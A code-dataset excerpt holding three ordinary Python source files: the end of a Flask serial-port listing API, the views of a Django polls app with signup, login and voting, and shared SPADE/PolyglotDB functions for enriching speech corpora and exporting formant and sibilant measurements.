serial.tools.list_ports.comports()\n else:\n try:\n # wrap the single match in a list so len() below works\n devices = [next(serial.tools.list_ports.grep(nome))]\n except StopIteration:\n # When you cannot find devices\n abort(404)\n if len(devices) == 0:\n # When you cannot find devices\n abort(404)\n else:\n res = {'devices': devices}\n # Use return json.dumps(res) to return in string\n return res\n\n\napi.add_resource(SimpleRest, '/')\napi.add_resource(\n serialDevices,\n '/serialDevices',\n '/serialDevices/<string:nome>'\n)\n\nif __name__ == '__main__':\n startup()\n","repo_name":"somosprte/Hermes","sub_path":"hermes/hermes.py","file_name":"hermes.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} {"seq_id":"28680602423","text":"from django.http import HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.contrib.auth import login, authenticate\nfrom django.urls import reverse\nfrom django.views import generic\nfrom django.utils import timezone\n\nfrom .models import Choice, Question\n\n\ndef home(request):\n if request.session.get('login_check'):\n return redirect('/posts')\n else:\n return render(request, 'polls/home.html')\n\n\nclass IndexView(generic.ListView):\n template_name = 'polls/posts.html'\n context_object_name = 'latest_question_list'\n\n def get_queryset(self):\n \"\"\"\n Return the last five published questions (not including those set to be\n published in the future).\n Question.objects.filter(pub_date__lte=timezone.now())\n returns a queryset containing Questions whose pub_date is less than or equal to - that 
is, earlier than or equal to - timezone.now.\n \"\"\"\n return Question.objects.filter(\n pub_date__lte=timezone.now()\n ).order_by('-pub_date') # [:5]\n\n\nclass DetailView(generic.DetailView):\n model = Question\n template_name = 'polls/post_details.html'\n\n def get_queryset(self):\n \"\"\"\n Excludes any questions that aren't published yet.\n \"\"\"\n return Question.objects.filter(pub_date__lte=timezone.now())\n\n\nclass ResultsView(generic.DetailView):\n model = Question\n template_name = 'polls/results.html'\n\n\ndef vote(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n try:\n selected_choice = question.choice_set.get(pk=request.POST['choice'])\n except (KeyError, Choice.DoesNotExist):\n # Redisplay the question voting form.\n return render(request, 'polls/post_details.html', {\n 'question': question,\n 'error_message': \"You didn't select a choice.\",\n })\n else:\n selected_choice.votes += 1\n selected_choice.save()\n # Always return an HttpResponseRedirect after successfully dealing\n # with POST data. This prevents data from being posted twice if a\n # user hits the Back button.\n return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))\n\n\ndef signup(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=username, password=raw_password)\n login(request, user)\n request.session['login_check'] = True\n request.session['username'] = user.username\n return redirect('/posts')\n else:\n form = UserCreationForm()\n return render(request, 'polls/signup.html', {'form': form})\n\n\ndef signin(request):\n if request.method == 'POST':\n form = AuthenticationForm(data=request.POST)\n if form.is_valid():\n user = form.get_user()\n login(request, user)\n request.session['login_check'] = True\n request.session['username'] = user.username\n return redirect('/posts')\n else:\n form = AuthenticationForm()\n return render(request, 'polls/login.html', {'form': form})\n\n\ndef logout(request):\n # Deletes the current session data from the session and deletes the session cookie\n request.session.flush()\n return redirect('/')\n\n\ndef add_comment(request):\n question = Question.objects.get(pk=request.POST['qPK'])\n question.comments_set.create(comment_text=request.POST['comment'],\n comment_author=request.session.get('username'), pub_date=timezone.now())\n question.save()\n\n return redirect('/posts/' + request.POST['qPK'] + '/')\n\n\ndef new_post(request):\n if request.method == \"POST\":\n question = Question()\n question.author = request.session.get('username')\n question.pub_date = timezone.now()\n question.save()\n question.question_text = request.POST['question_post']\n question.choice_set.create(choice_text=request.POST['choice1'])\n question.choice_set.create(choice_text=request.POST['choice2'])\n question.choice_set.create(choice_text=request.POST['choice3'])\n question.save()\n return redirect('/posts', pk=question.pk)\n return render(request, 'polls/new_post.html')\n","repo_name":"Daily120/dj_Project","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"39153326516","text":"#################################################\n## Common functions for SPADE analysis scripts 
##\n#################################################\n\n## this file defines functions and values shared between SPADE analysis scripts\n## such as performing basic speaker, lexical, and linguistic enrichments of corpora,\n## as well as functions for interacting with the ISCAN server\n\n## base functions\nimport time\nfrom datetime import datetime\nimport os\nimport sys\n\nsys.path.insert(0, '/mnt/e/Dev/Polyglot/PolyglotDB')\nimport re\nimport yaml\nimport csv\nimport platform\nimport polyglotdb.io as pgio\n\n## PolyglotDB functions\nfrom polyglotdb import CorpusContext\nfrom polyglotdb.utils import ensure_local_database_running\nfrom polyglotdb.config import CorpusConfig\nfrom polyglotdb.io.enrichment import enrich_speakers_from_csv, enrich_lexicon_from_csv\nfrom polyglotdb.acoustics.formants.refined import analyze_formant_points_refinement\nfrom polyglotdb.client.client import PGDBClient, ClientError\n\nbase_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n# =============== CONFIGURATION ===============\n## default values for connecting to the server\nserver_ip = \"localhost\"\ndocker_ip = \"app\"\nserver_port = 8080\n\n## default values for formant enrichment (see formant analysis functions below)\nduration_threshold = 0.05\nnIterations = 20\n\n## default paths\nsibilant_script_path = os.path.join(base_dir, 'Common', 'sibilant_jane_optimized.praat')\n\n# =============================================\nnow = datetime.now()\ndate = '{}-{}-{}'.format(now.year, now.month, now.day)\n\n\ndef load_token():\n token_path = os.path.join(base_dir, 'auth_token')\n if not os.path.exists(token_path):\n return None\n with open(token_path, 'r') as f:\n token = f.read().strip()\n return token\n\n\ndef save_performance_benchmark(config, task, time_taken):\n \"\"\"Calculate the runtime of a process and save it\"\"\"\n\n benchmark_folder = os.path.join(base_dir, 'benchmarks')\n os.makedirs(benchmark_folder, exist_ok=True)\n benchmark_file = os.path.join(benchmark_folder, 'benchmarks.csv')\n if not os.path.exists(benchmark_file):\n with open(benchmark_file, 'w', encoding='utf8') as f:\n writer = csv.writer(f, delimiter=',')\n writer.writerow(['Computer', 'Corpus', 'Date', 'Corpus_size', 'Task', 'Time'])\n with open(benchmark_file, 'a', encoding='utf8') as f:\n writer = csv.writer(f, delimiter=',')\n writer.writerow([platform.node(), config.corpus_name, date, get_size_of_corpus(config), task, time_taken])\n\n\ndef load_config(corpus_name):\n \"\"\"Open the YAML configuration file and check it is correctly structured\"\"\"\n\n path = os.path.join(base_dir, corpus_name, '{}.yaml'.format(corpus_name))\n if not os.path.exists(path):\n print('The config file for the specified corpus does not exist ({}).'.format(path))\n sys.exit(1)\n expected_keys = ['corpus_directory', 'input_format', 'dialect_code', 'unisyn_spade_directory',\n 'speaker_enrichment_file',\n 'speakers', 'vowel_inventory', 'stressed_vowels', 'sibilant_segments'\n ]\n with open(path, 'r', encoding='utf8') as f:\n conf = yaml.safe_load(f)\n missing_keys = []\n for k in expected_keys:\n if k not in conf:\n missing_keys.append(k)\n\n ## check if the vowel prototypes file exists\n if 'vowel_prototypes_path' not in conf:\n conf['vowel_prototypes_path'] = ''\n print('no vowel prototypes path given, so using no prototypes')\n elif not os.path.exists(conf['vowel_prototypes_path']):\n conf['vowel_prototypes_path'] = ''\n print('vowel prototypes path not valid, so using no prototypes')\n\n if missing_keys:\n print('The following keys were missing from {}: {}'.format(path, ', '.join(missing_keys)))\n sys.exit(1)\n return conf\n\n
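## Example of the YAML layout load_config expects (all values here are made up for illustration):\n## corpus_directory: /data/corpora/my_corpus\n## input_format: mfa\n## dialect_code: us\n## unisyn_spade_directory: /data/unisyn_spade\n## speaker_enrichment_file: /data/enrichment/speaker_info.csv\n## speakers: []\n## vowel_inventory: ['AA1', 'AE1']\n## stressed_vowels: ['AA1', 'AE1']\n## sibilant_segments: ['S', 'Z', 'SH', 'ZH']\n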
\ndef call_back(*args):\n args = [x for x in args if isinstance(x, str)]\n if args:\n print(' '.join(args))\n\n\ndef reset(corpus_name):\n \"\"\"Remove the database files produced from import.\"\"\"\n\n with ensure_local_database_running(corpus_name, port=8080, ip=server_ip, token=load_token()) as params:\n config = CorpusConfig(corpus_name, **params)\n with CorpusContext(config) as c:\n print('Resetting the corpus.')\n c.reset()\n\ndef loading(config, corpus_dir, textgrid_format):\n \"\"\"Load the corpus\"\"\"\n\n ## first check if a database for the corpus\n ## has already been created\n with CorpusContext(config) as c:\n exists = c.exists()\n if exists:\n print('Corpus already loaded, skipping import.')\n return\n if not os.path.exists(corpus_dir):\n print('The path {} does not exist.'.format(corpus_dir))\n sys.exit(1)\n\n ## if there is no database file,\n ## begin with importing the corpus\n textgrid_format = textgrid_format.upper()\n with CorpusContext(config) as c:\n print('loading')\n\n ## Use the appropriate importer based\n ## on the format of the corpus\n if textgrid_format in [\"BUCKEYE\", \"B\"]:\n parser = pgio.inspect_buckeye(corpus_dir)\n elif textgrid_format == \"CSV\":\n parser = pgio.inspect_buckeye(corpus_dir)\n elif textgrid_format in [\"FAVE\", \"F\"]:\n parser = pgio.inspect_fave(corpus_dir)\n elif textgrid_format == \"ILG\":\n parser = pgio.inspect_ilg(corpus_dir)\n elif textgrid_format in [\"LABBCAT\", \"L\"]:\n parser = pgio.inspect_labbcat(corpus_dir)\n elif textgrid_format in [\"P\", \"PARTITUR\"]:\n parser = pgio.inspect_partitur(corpus_dir)\n elif textgrid_format in [\"MAUS\", \"W\"]:\n parser = pgio.inspect_maus(corpus_dir)\n elif textgrid_format in [\"TIMIT\", \"T\"]:\n parser = pgio.inspect_timit(corpus_dir)\n else:\n parser = pgio.inspect_mfa(corpus_dir)\n parser.call_back = call_back\n beg = time.time()\n c.load(parser, corpus_dir)\n end = time.time()\n time_taken = end - beg\n print('Loading took: {}'.format(time_taken))\n save_performance_benchmark(config, 'import', time_taken)\n\n\ndef basic_enrichment(config, syllabics, pauses):\n \"\"\"Enrich the corpus database with syllable and utterance information.\"\"\"\n\n with CorpusContext(config) as g:\n if 'utterance' not in g.annotation_types:\n ## encode utterances based on presence of an intervening pause\n ## default 150ms\n print('encoding utterances')\n begin = time.time()\n g.encode_pauses(pauses)\n g.encode_utterances(min_pause_length=0.15)\n time_taken = time.time() - begin\n print('Utterance enrichment took: {}'.format(time_taken))\n save_performance_benchmark(config, 'utterance_encoding', time_taken)\n\n if syllabics and 'syllable' not in g.annotation_types:\n ## encode syllabic information using maximum-onset principle\n print('encoding syllables')\n begin = time.time()\n g.encode_syllabic_segments(syllabics)\n g.encode_syllables('maxonset')\n time_taken = time.time() - begin\n print('Syllable enrichment took: {}'.format(time.time() - begin))\n save_performance_benchmark(config, 'syllable_encoding', time_taken)\n\n print('enriching utterances')\n if syllabics and not g.hierarchy.has_token_property('utterance', 'speech_rate'):\n begin = time.time()\n g.encode_rate('utterance', 'syllable', 'speech_rate')\n time_taken = time.time() - begin\n 
print('Speech rate encoding took: {}'.format(time.time() - begin))\n save_performance_benchmark(config, 'speech_rate_encoding', time_taken)\n\n if not g.hierarchy.has_token_property('utterance', 'num_words'):\n begin = time.time()\n g.encode_count('utterance', 'word', 'num_words')\n time_taken = time.time() - begin\n print('Word count encoding took: {}'.format(time.time() - begin))\n save_performance_benchmark(config, 'num_words_encoding', time_taken)\n\n if syllabics and not g.hierarchy.has_token_property('utterance', 'num_syllables'):\n begin = time.time()\n g.encode_count('utterance', 'syllable', 'num_syllables')\n time_taken = time.time() - begin\n print('Syllable count encoding took: {}'.format(time.time() - begin))\n save_performance_benchmark(config, 'num_syllables_encoding', time_taken)\n\n if syllabics and not g.hierarchy.has_token_property('syllable', 'position_in_word'):\n print('enriching syllables')\n begin = time.time()\n g.encode_position('word', 'syllable', 'position_in_word')\n time_taken = time.time() - begin\n print('Syllable position encoding took: {}'.format(time.time() - begin))\n save_performance_benchmark(config, 'position_in_word_encoding', time_taken)\n\n if syllabics and not g.hierarchy.has_token_property('syllable', 'num_phones'):\n begin = time.time()\n g.encode_count('syllable', 'phone', 'num_phones')\n time_taken = time.time() - begin\n print('Phone count encoding took: {}'.format(time.time() - begin))\n save_performance_benchmark(config, 'num_phones_encoding', time_taken)\n\n if syllabics and not g.hierarchy.has_token_property('word', 'num_syllables'):\n begin = time.time()\n g.encode_count('word', 'syllable', 'num_syllables')\n time_taken = time.time() - begin\n print('Syllable count encoding took: {}'.format(time.time() - begin))\n save_performance_benchmark(config, 'num_syllables_encoding', time_taken)\n\n print('enriching syllables')\n ## generate the word-level stress pattern, either from an external pronunciation dictionary\n ## or by the presence of numeric values on the vowel phones\n if syllabics and g.hierarchy.has_type_property('word', 'stresspattern') and not g.hierarchy.has_token_property(\n 'syllable',\n 'stress'):\n begin = time.time()\n g.encode_stress_from_word_property('stresspattern')\n time_taken = time.time() - begin\n print(\"encoded stress\")\n save_performance_benchmark(config, 'stress_encoding_from_pattern', time_taken)\n elif syllabics and re.search(r\"\\d\", syllabics[0]) and not g.hierarchy.has_type_property('syllable',\n 'stress'): # If stress is included in the vowels\n begin = time.time()\n g.encode_stress_to_syllables(\"[0-9]\", clean_phone_label=False)\n time_taken = time.time() - begin\n print(\"encoded stress\")\n save_performance_benchmark(config, 'stress_encoding', time_taken)\n\n\ndef lexicon_enrichment(config, unisyn_spade_directory, dialect_code):\n \"\"\"Enrich the database with lexical information, such as stress position and UNISYN phone labels.\"\"\"\n\n enrichment_dir = os.path.join(unisyn_spade_directory, 'enrichment_files')\n if not os.path.exists(enrichment_dir):\n print('Could not find enrichment_files directory from {}, skipping lexical enrichment.'.format(\n unisyn_spade_directory))\n return\n with CorpusContext(config) as g:\n\n for lf in os.listdir(enrichment_dir):\n path = os.path.join(enrichment_dir, lf)\n if lf == 'rule_applications.csv':\n if g.hierarchy.has_type_property('word', 'UnisynPrimStressedVowel1'.lower()):\n print('Dialect independent enrichment already loaded, skipping.')\n continue\n elif 
lf.startswith(dialect_code):\n if g.hierarchy.has_type_property('word', 'UnisynPrimStressedVowel2_{}'.format(\n dialect_code).lower()):\n print('Dialect specific enrichment already loaded, skipping.')\n continue\n else:\n continue\n begin = time.time()\n enrich_lexicon_from_csv(g, path)\n time_taken = time.time() - begin\n print('Lexicon enrichment took: {}'.format(time.time() - begin))\n save_performance_benchmark(config, 'lexicon_enrichment', time_taken)\n\n\ndef speaker_enrichment(config, speaker_file):\n \"\"\"Enrich the database with speaker information (e.g. age, dialect) from a speaker metadata file.\"\"\"\n\n if not os.path.exists(speaker_file):\n print('Could not find {}, skipping speaker enrichment.'.format(speaker_file))\n return\n with CorpusContext(config) as g:\n if not g.hierarchy.has_speaker_property('gender'):\n begin = time.time()\n enrich_speakers_from_csv(g, speaker_file)\n time_taken = time.time() - begin\n print('Speaker enrichment took: {}'.format(time.time() - begin))\n save_performance_benchmark(config, 'speaker_enrichment', time_taken)\n else:\n print('Speaker enrichment already done, skipping.')\n\n\ndef sibilant_acoustic_analysis(config, sibilant_segments, ignored_speakers=None):\n \"\"\"Encode sibilant class and analyze sibilants using the praat script.\"\"\"\n\n with CorpusContext(config) as c:\n if c.hierarchy.has_token_property('phone', 'cog'):\n print('Sibilant acoustics already analyzed, skipping.')\n return\n print('Beginning sibilant analysis')\n beg = time.time()\n if ignored_speakers:\n ## make a subset of the phones in database for sibilants: sibilants included\n ## in this subset are defined in the corpus's YAML configuration file\n q = c.query_graph(c.phone).filter(c.phone.label.in_(sibilant_segments))\n q = q.filter(c.phone.speaker.name.not_in_(ignored_speakers))\n ## check the phone is greater than 10ms:\n ## this is the usual time resolution for forced alignment\n q = q.filter(c.phone.duration > 0.01)\n q.create_subset(\"sibilant\")\n else:\n c.encode_class(sibilant_segments, 'sibilant')\n time_taken = time.time() - beg\n save_performance_benchmark(config, 'sibilant_encoding', time_taken)\n print('sibilants encoded')\n\n # analyze all sibilants using the Praat script (found at the path defined at the top of this script)\n beg = time.time()\n c.analyze_script(annotation_type='phone', subset='sibilant', script_path=sibilant_script_path, duration_threshold=0.01)\n end = time.time()\n time_taken = time.time() - beg\n print('Sibilant analysis took: {}'.format(end - beg))\n save_performance_benchmark(config, 'sibilant_acoustic_analysis', time_taken)\n\n\ndef formant_acoustic_analysis(config, vowels, vowel_prototypes_path, ignored_speakers=None, drop_formant=False, output_tracks = False, subset=\"vowel\", reset_formants=False):\n ## Function for performing the formant estimation and analysis.\n ## Input:\n ## - list of vowels to analyse\n ## - path to the vowel prototype file\n ## Output:\n ## - static (single point) formant and bandwith (F1-3, B1-3)\n ## for vowel phones included in the corpus\n with CorpusContext(config) as c:\n if vowels is not None:\n\n ## Define the object of formant analysis:\n ## phones in the list of vowels that are\n ## greater than 50ms in duration\n if ignored_speakers:\n q = c.query_graph(c.phone).filter(c.phone.label.in_(vowels))\n q = q.filter(c.phone.speaker.name.not_in_(ignored_speakers))\n q = q.filter(c.phone.duration >= 0.05)\n q.create_subset(subset)\n else:\n c.encode_class(vowels, subset)\n\n ## Check if formant 
estimation has already been completed\n ## for this corpus, and skip if so.\n if not reset_formants and not output_tracks and c.hierarchy.has_token_property('phone', 'F1'):\n print('Formant point analysis already done, skipping.')\n return\n elif not reset_formants and output_tracks and 'formants' in c.hierarchy.acoustics:\n print('Formant track analysis already done, skipping.')\n return\n\n print('Beginning formant analysis')\n beg = time.time()\n time_taken = time.time() - beg\n save_performance_benchmark(config, 'vowel_encoding', time_taken)\n print('vowels encoded')\n beg = time.time()\n\n ## Call the formant estimation function from the PolyglotDB package. Please see the PolyglotDB documentation\n ## (https://polyglotdb.readthedocs.io/en/latest/acoustics_encoding.html#encoding-formants) for details\n ## about how formants are estimated\n metadata = analyze_formant_points_refinement(c, subset, duration_threshold=duration_threshold,\n num_iterations=nIterations,\n vowel_prototypes_path=vowel_prototypes_path,\n drop_formant=drop_formant,\n output_tracks = output_tracks)\n end = time.time()\n time_taken = time.time() - beg\n print('Analyzing formants took: {}'.format(end - beg))\n save_performance_benchmark(config, 'formant_acoustic_analysis', time_taken)\n\n\ndef formant_export(config, corpus_name, dialect_code, speakers, vowels, ignored_speakers=None, output_tracks=True):\n ## Create and export a query using formants derived using the formant_acoustic_analysis function.\n\n ## Choose file output name depending on whether the query\n ## concerns a single-point or multi-point track measurements\n if output_tracks:\n csv_path = os.path.join(base_dir, corpus_name, '{}_formant_tracks.csv'.format(corpus_name))\n else:\n csv_path = os.path.join(base_dir, corpus_name, '{}_formants.csv'.format(corpus_name))\n ## Get list of relevant vowel columns from the UNISYN software\n other_vowel_codes = ['unisynPrimStressedVowel2_{}'.format(dialect_code),\n 'UnisynPrimStressedVowel3_{}'.format(dialect_code),\n 'UnisynPrimStressedVowel3_XSAMPA',\n 'AnyRuleApplied_{}'.format(dialect_code)]\n\n with CorpusContext(config) as c:\n print('Beginning formant export')\n beg = time.time()\n q = c.query_graph(c.phone)\n ## exclude tokens below 50ms\n q = q.filter(c.phone.duration >= 0.05)\n if speakers:\n q = q.filter(c.phone.speaker.name.in_(speakers))\n if ignored_speakers:\n q = q.filter(c.phone.speaker.name.not_in_(ignored_speakers))\n q = q.filter(c.phone.label.in_(vowels))\n\n ## Define the columns to be included in the query (i.e., exported in the CSV).\n ## Columns include speaker and lexical metadata, information about the phone (start, end, duration, etc),\n ## the phone's surrounding phonological environment, as well as columns referring to the formant values\n ## Note: the single-point CSV write one row per token, whilst the track CSV contains 21 rows per token\n ## (one per formant point measurement)\n if output_tracks:\n q = q.columns(c.phone.speaker.name.column_name('speaker'), c.phone.discourse.name.column_name('discourse'),\n c.phone.id.column_name('phone_id'), c.phone.label.column_name('phone_label'),\n c.phone.begin.column_name('begin'), c.phone.end.column_name('end'),\n c.phone.duration.column_name('duration'),\n c.phone.following.label.column_name('following_phone'),\n c.phone.previous.label.column_name('previous_phone'), c.phone.word.label.column_name('word'),\n c.phone.formants.track)\n else:\n q = q.columns(c.phone.speaker.name.column_name('speaker'), 
c.phone.discourse.name.column_name('discourse'),\n c.phone.id.column_name('phone_id'), c.phone.label.column_name('phone_label'),\n c.phone.begin.column_name('begin'), c.phone.end.column_name('end'),\n c.phone.syllable.stress.column_name('syllable_stress'),\n c.phone.syllable.word.stresspattern.column_name('word_stress_pattern'),\n c.phone.syllable.position_in_word.column_name('syllable_position_in_word'),\n c.phone.duration.column_name('duration'),\n c.phone.following.label.column_name('following_phone'),\n c.phone.previous.label.column_name('previous_phone'), c.phone.word.label.column_name('word'),\n c.phone.F1.column_name('F1'), c.phone.F2.column_name('F2'), c.phone.F3.column_name('F3'),\n c.phone.B1.column_name('B1'), c.phone.B2.column_name('B2'), c.phone.B3.column_name('B3'),\n c.phone.A1.column_name('A1'), c.phone.A2.column_name('A2'), c.phone.A3.column_name('A3'), c.phone.Ax.column_name('Ax'), c.phone.num_formants.column_name('num_formants'), c.phone.drop_formant.column_name('drop_formant'))\n\n ## Add UNISYN columns\n if c.hierarchy.has_type_property('word', 'UnisynPrimStressedVowel1'.lower()):\n q = q.columns(c.phone.word.unisynprimstressedvowel1.column_name('UnisynPrimStressedVowel1'))\n for v in other_vowel_codes:\n if c.hierarchy.has_type_property('word', v.lower()):\n q = q.columns(getattr(c.phone.word, v.lower()).column_name(v))\n for sp, _ in c.hierarchy.speaker_properties:\n if sp == 'name':\n continue\n q = q.columns(getattr(c.phone.speaker, sp).column_name(sp))\n\n ## Write query to a CSV file\n q.to_csv(csv_path)\n end = time.time()\n time_taken = time.time() - beg\n print('Query took: {}'.format(end - beg))\n print(\"Results for query written to \" + csv_path)\n save_performance_benchmark(config, 'formant_export', time_taken)\n\n\ndef sibilant_export(config, corpus_name, dialect_code, speakers, ignored_speakers=None):\n csv_path = os.path.join(base_dir, corpus_name, '{}_sibilants.csv'.format(corpus_name))\n with CorpusContext(config) as c:\n # export to CSV all the measures taken by the script, along with a variety of data about each phone\n print(\"Beginning sibilant export\")\n beg = time.time()\n # filter data only to word-initial sibilants\n q = c.query_graph(c.phone).filter(c.phone.subset == 'sibilant')\n q = q.filter(c.phone.begin == c.phone.syllable.word.begin)\n # ensure that all phones are associated with a speaker\n if speakers:\n q = q.filter(c.phone.speaker.name.in_(speakers))\n if ignored_speakers:\n q = q.filter(c.phone.speaker.name.not_in_(ignored_speakers))\n # this exports data for all sibilants\n # information about the phone, syllable, and word (label, start/endpoints etc)\n # also spectral properties of interest (COG, spectral peak/slope/spread)\n qr = q.columns(c.phone.speaker.name.column_name('speaker'),\n c.phone.discourse.name.column_name('discourse'),\n\n # phone-level information (label, start/endpoint, etc)\n c.phone.id.column_name('phone_id'), c.phone.label.column_name('phone_label'),\n c.phone.begin.column_name('phone_begin'), c.phone.end.column_name('phone_end'),\n c.phone.duration.column_name('duration'),\n\n # surrounding phone information\n c.phone.following.label.column_name('following_phone'),\n c.phone.previous.label.column_name('previous_phone'),\n\n # word and syllable information (e.g., stress,\n # onset/nuclus/coda of the syllable)\n # determined from maximum onset algorithm in\n # basic_enrichment function\n c.phone.syllable.word.label.column_name('word'),\n c.phone.syllable.word.id.column_name('word_id'),\n 
c.phone.syllable.stress.column_name('syllable_stress'),\n c.phone.syllable.phone.filter_by_subset('onset').label.column_name('onset'),\n c.phone.syllable.phone.filter_by_subset('nucleus').label.column_name('nucleus'),\n c.phone.syllable.phone.filter_by_subset('coda').label.column_name('coda'),\n\n # acoustic information of interest (spectral measurements)\n c.phone.cog.column_name('cog'), c.phone.peak.column_name('peak'),\n c.phone.slope.column_name('slope'), c.phone.spread.column_name('spread'))\n\n # get columns of speaker metadata\n for sp, _ in c.hierarchy.speaker_properties:\n if sp == 'name':\n continue\n q = q.columns(getattr(c.phone.speaker, sp).column_name(sp))\n\n # as Buckeye has had labels changed to reflect phonetic realisation,\n # need to also get the original transcription for comparison with\n # other corpora\n if c.hierarchy.has_token_property('word', 'surface_transcription'):\n print('getting underlying and surface transcriptions')\n q = q.columns(\n c.phone.word.transcription.column_name('word_underlying_transcription'),\n c.phone.word.surface_transcription.column_name('word_surface_transcription'))\n\n # write the query to a CSV\n qr.to_csv(csv_path)\n end = time.time()\n time_taken = time.time() - beg\n print('Query took: {}'.format(end - beg))\n print(\"Results for query written to \" + csv_path)\n save_performance_benchmark(config, 'sibilant_export', time_taken)\n\ndef polysyllabic_export(config, corpus_name, dialect_code, speakers):\n csv_path = os.path.join(base_dir, corpus_name, '{}_polysyllabic.csv'.format(corpus_name))\n with CorpusContext(config) as c:\n\n print(\"Beginning polysyllabic export\")\n beg = time.time()\n q = c.query_graph(c.syllable)\n q = q.filter(c.syllable.word.end == c.syllable.word.utterance.end)\n q = q.filter(c.syllable.begin == c.syllable.word.begin)\n if speakers:\n q = q.filter(c.phone.speaker.name.in_(speakers))\n\n qr = q.columns(c.syllable.speaker.name.column_name('speaker'),\n c.syllable.label.column_name('syllable_label'),\n c.syllable.duration.column_name('syllable_duration'),\n c.syllable.word.label.column_name('word'),\n c.syllable.word.stresspattern.column_name('stress_pattern'),\n c.syllable.word.num_syllables.column_name('num_syllables'))\n for sp, _ in c.hierarchy.speaker_properties:\n if sp == 'name':\n continue\n q = q.columns(getattr(c.syllable.speaker, sp).column_name(sp))\n\n qr.to_csv(csv_path)\n end = time.time()\n time_taken = time.time() - beg\n print('Query took: {}'.format(end - beg))\n print(\"Results for query written to \" + csv_path)\n save_performance_benchmark(config, 'polysyllabic_export', time_taken)\n\ndef get_size_of_corpus(config):\n from polyglotdb.query.base.func import Sum\n with CorpusContext(config) as c:\n c.config.query_behavior = 'other'\n if 'utterance' not in c.annotation_types:\n q = c.query_graph(c.word).columns(Sum(c.word.duration).column_name('result'))\n else:\n q = c.query_graph(c.utterance).columns(Sum(c.utterance.duration).column_name('result'))\n results = q.all()\n return results[0]['result']\n\ndef check_database(corpus_name, token = load_token(), port = 8080):\n host = 'http://localhost:{}'.format(port)\n client = PGDBClient(host, token)\n try:\n client.start_database(corpus_name)\n except Exception as e:\n print(\"Database problem: {}\".format(e))\n\ndef basic_queries(config):\n from polyglotdb.query.base.func import Sum\n with CorpusContext(config) as c:\n print(c.hierarchy)\n print('beginning basic queries')\n beg = time.time()\n q = 
c.query_lexicon(c.lexicon_phone).columns(c.lexicon_phone.label.column_name('label'))\n results = q.all()\n print('The phone inventory is:', ', '.join(sorted(x['label'] for x in results)))\n for r in results:\n total_count = c.query_graph(c.phone).filter(c.phone.label == r['label']).count()\n duration_threshold_count = c.query_graph(c.phone).filter(c.phone.label == r['label']).filter(\n c.phone.duration >= duration_threshold).count()\n qr = c.query_graph(c.phone).filter(c.phone.label == r['label']).limit(1)\n qr = qr.columns(c.phone.word.label.column_name('word'),\n c.phone.word.transcription.column_name('transcription'))\n res = qr.all()\n if len(res) == 0:\n print('An example for {} was not found.'.format(r['label']))\n else:\n res = res[0]\n print('An example for {} (of {}, {} above {}) is the word \"{}\" with the transcription [{}]'.format(\n r['label'], total_count, duration_threshold_count, duration_threshold, res['word'],\n res['transcription']))\n\n q = c.query_speakers().columns(c.speaker.name.column_name('name'))\n results = q.all()\n print('The speakers in the corpus are:', ', '.join(sorted(x['name'] for x in results)))\n c.config.query_behavior = 'other'\n q = c.query_graph(c.utterance).columns(Sum(c.utterance.duration).column_name('result'))\n results = q.all()\n q = c.query_graph(c.word).columns(Sum(c.word.duration).column_name('result'))\n word_results = q.all()\n print('The total length of speech in the corpus is: {} seconds (utterances) {} seconds (words'.format(\n results[0]['result'], word_results[0]['result']))\n time_taken = time.time() - beg\n save_performance_benchmark(config, 'basic_query', time_taken)\n\n\ndef basic_size_queries(config):\n from statistics import mean\n import datetime\n from polyglotdb.query.base.func import Sum, Count\n with CorpusContext(config) as c:\n print('beginning size queries')\n speaker_q = c.query_speakers().columns(c.speaker.name.column_name('name'), Count(c.speaker.discourses.name).column_name('num_discourses'))\n\n average_num_discourses = mean(x['num_discourses'] for x in speaker_q.all())\n discourse_q = c.query_discourses().columns(c.discourse.name.column_name('name'), c.discourse.duration.column_name('duration'), Count(c.discourse.speakers.name).column_name('num_speakers'))\n average_duration = mean(x['duration'] for x in discourse_q.all() if x['duration'] is not None)\n average_num_speakers = mean(x['num_speakers'] for x in discourse_q.all())\n speaker_word_counts = []\n for s in c.speakers:\n q = c.query_graph(c.word).filter(c.word.speaker.name == s)\n speaker_word_counts.append(q.count())\n discourse_word_counts = []\n for d in c.discourses:\n q = c.query_graph(c.word).filter(c.word.discourse.name == d)\n discourse_word_counts.append(q.count())\n print('')\n print('')\n print('There are {} speakers and {} discourses in the corpus.'.format(speaker_q.count(), discourse_q.count()))\n print('The average duration of discourses is {}.'.format(datetime.timedelta(seconds=average_duration)))\n print('The average number of words per speaker is {} and speakers speak in {} discourses on average.'.format(mean(speaker_word_counts), average_num_discourses))\n print('The average number of words per discourse is {} and have {} speakers on average.'.format(mean(discourse_word_counts), average_num_speakers))\n","repo_name":"MontrealCorpusTools/SPADE","sub_path":"Common/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":32534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} 
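Every export function in the SPADE script above repeats the same timing boilerplate: capture beg = time.time(), run the query, compute time_taken, and call save_performance_benchmark(config, name, time_taken). Below is a minimal sketch of how that pattern could be factored into a decorator; the decorator, the stub, and the do_export example are illustrative assumptions rather than part of the SPADE code, and only the save_performance_benchmark name and the config-first argument convention come from the source.

import time
from functools import wraps

def save_performance_benchmark(config, name, time_taken):
    # Stand-in for the project's own implementation, for illustration only.
    print('benchmark {}: {:.3f}s'.format(name, time_taken))

def benchmarked(name):
    # Wrap a function whose first positional argument is `config`, time it,
    # and record the elapsed time under `name`, mirroring the beg/time_taken
    # pattern used throughout the script above.
    def decorator(func):
        @wraps(func)
        def wrapper(config, *args, **kwargs):
            beg = time.time()
            result = func(config, *args, **kwargs)
            time_taken = time.time() - beg
            save_performance_benchmark(config, name, time_taken)
            return result
        return wrapper
    return decorator

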